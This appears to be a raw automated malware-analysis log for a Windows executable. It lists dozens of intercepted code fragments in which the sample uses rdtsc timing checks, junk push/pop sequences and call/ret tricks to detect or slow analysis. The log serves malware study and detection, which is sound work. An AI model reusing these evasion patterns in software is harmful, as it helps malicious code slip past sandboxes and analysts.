Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17439F4 second address: 1743A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b jnl 00007FEEDCB2F2ECh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007FEEDCB2F2F6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1743A16 second address: 1743A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB1F6DAh 0x00000009 jmp 00007FEEDCB1F6E0h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1743A34 second address: 1743A3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1743A3B second address: 1743A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1743A41 second address: 1743A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1743EA8 second address: 1743EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1743EAC second address: 1743EB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FEEDCB2F2E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1743EB7 second address: 1743EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1747DA1 second address: 1747DA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1747DA9 second address: 1747DBB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007FEEDCB1F6D6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1747DBB second address: 1747DDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007FEEDCB2F2E6h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FEEDCB2F2F2h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1747DDD second address: 1747DE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1747DE3 second address: 1747DFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB2F2F6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1747DFD second address: 1747E0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FEEDCB1F6DEh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16C29C5 second address: 16C2A04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FEEDCB2F2E8h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 jmp 00007FEEDCB2F2F4h 0x0000001b jns 00007FEEDCB2F2E6h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16C2A04 second address: 16C2A1C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEEDCB1F6DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007FEEDCB1F6D6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16C2A1C second address: 16C2A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 174C3F8 second address: 174C3FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 174C3FC second address: 174C41F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB2F2F7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 174C41F second address: 174C423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 174C423 second address: 174C429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 174C429 second address: 174C43E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FEEDCB1F6E0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 174C720 second address: 174C735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007FEEDCB2F2EDh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 174C87F second address: 174C892 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEEDCB1F6D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnp 00007FEEDCB1F6D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 174C892 second address: 174C8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB2F2EDh 0x00000009 popad 0x0000000a push edi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edi 0x0000000e jne 00007FEEDCB2F2ECh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 174C8B0 second address: 174C8BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 jnc 00007FEEDCB1F6D6h 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 174CBFC second address: 174CC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 174D12C second address: 174D130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 174D426 second address: 174D46D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2EEh 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jnc 00007FEEDCB2F2F9h 0x00000014 pushad 0x00000015 jnp 00007FEEDCB2F2E6h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push esi 0x0000001f jo 00007FEEDCB2F2E6h 0x00000025 pop esi 0x00000026 pushad 0x00000027 pushad 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 174D46D second address: 174D473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 174D8D8 second address: 174D8E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 174D8E0 second address: 174D8E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 174D8E9 second address: 174D8FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FEEDCB2F2E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FEEDCB2F2E6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 174D8FD second address: 174D901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1751712 second address: 1751718 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1751718 second address: 175173B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEEDCB1F6D6h 0x00000008 jmp 00007FEEDCB1F6E3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 175173B second address: 1751741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1751741 second address: 175175A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007FEEDCB1F6E1h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1757DD2 second address: 1757DDF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEEDCB2F2E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17569F6 second address: 17569FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17569FB second address: 1756A38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB2F2F9h 0x00000007 push edi 0x00000008 jbe 00007FEEDCB2F2E6h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FEEDCB2F2F3h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1756D10 second address: 1756D24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FEEDCB1F6D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FEEDCB1F6D6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1756D24 second address: 1756D28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1757043 second address: 1757048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1757048 second address: 175706A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FEEDCB2F2F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 175706A second address: 17570B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FEEDCB1F6D6h 0x0000000a popad 0x0000000b js 00007FEEDCB1F6ECh 0x00000011 jmp 00007FEEDCB1F6E6h 0x00000016 pushad 0x00000017 jmp 00007FEEDCB1F6DAh 0x0000001c jmp 00007FEEDCB1F6E4h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1757236 second address: 175723A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1757B01 second address: 1757B2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FEEDCB1F6E6h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007FEEDCB1F6D6h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1759B53 second address: 1759B76 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FEEDCB2F2F0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FEEDCB2F2EDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1759D38 second address: 1759D4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FEEDCB1F6D6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b jnl 00007FEEDCB1F6D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 175C920 second address: 175C926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 175C926 second address: 175C92A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 175C92A second address: 175C930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 175C930 second address: 175C94A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEDCB1F6E4h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 175C94A second address: 175C950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16C60C5 second address: 16C60CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 16C60CB second address: 16C60E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FEEDCB2F2EEh 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FEEDCB2F2E6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1763760 second address: 176377D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEDCB1F6E3h 0x00000009 jns 00007FEEDCB1F6D6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17624C3 second address: 17624C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17627A9 second address: 17627AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17627AD second address: 17627B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17627B1 second address: 17627EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FEEDCB1F6E6h 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 jc 00007FEEDCB1F6D6h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FEEDCB1F6DEh 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17627EB second address: 17627EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17193E7 second address: 1719401 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEEDCB1F6D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FEEDCB1F6DCh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1719401 second address: 1719457 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 or cx, 06FBh 0x0000000e mov ebx, dword ptr [ebp+1248A549h] 0x00000014 add edx, 31B1050Dh 0x0000001a add eax, ebx 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007FEEDCB2F2E8h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 mov edi, dword ptr [ebp+122D2893h] 0x0000003c nop 0x0000003d pushad 0x0000003e push eax 0x0000003f jc 00007FEEDCB2F2E6h 0x00000045 pop eax 0x00000046 push eax 0x00000047 push edx 0x00000048 ja 00007FEEDCB2F2E6h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1719457 second address: 171947D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEEDCB1F6D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEEDCB1F6E7h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 171947D second address: 17194D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEEDCB2F2F0h 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FEEDCB2F2E8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov edx, dword ptr [ebp+122D2943h] 0x0000002d push 00000004h 0x0000002f sub dword ptr [ebp+122D3610h], eax 0x00000035 push eax 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FEEDCB2F2EBh 0x0000003e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1767597 second address: 176759D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 176759D second address: 17675BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEDCB2F2F4h 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FEEDCB2F2E6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 17668EB second address: 17668EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1766BC3 second address: 1766BCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1766BCF second address: 1766BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1766FC7 second address: 1766FCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1766FCD second address: 1766FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1766FD1 second address: 1766FD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1769EA5 second address: 1769EAF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEEDCB1F6D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 176BBAD second address: 176BBB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1771E70 second address: 1771E7A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEEDCB1F6E2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1771E7A second address: 1771E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1771FFA second address: 1771FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1771FFF second address: 1772006 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1772006 second address: 1772029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FEEDCB1F6D6h 0x0000000a jmp 00007FEEDCB1F6DAh 0x0000000f popad 0x00000010 jl 00007FEEDCB1F6D8h 0x00000016 pushad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push edi 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1772029 second address: 1772034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1772034 second address: 177203A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 177203A second address: 177203E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 177203E second address: 1772042 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 1772157 second address: 177215D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeRDTSC instruction interceptor: First address: 177215D second address: 1772185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 jc 00007FEEDCB1F6D6h 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 jmp 00007FEEDCB1F6E7h 0x00000016 rdtsc
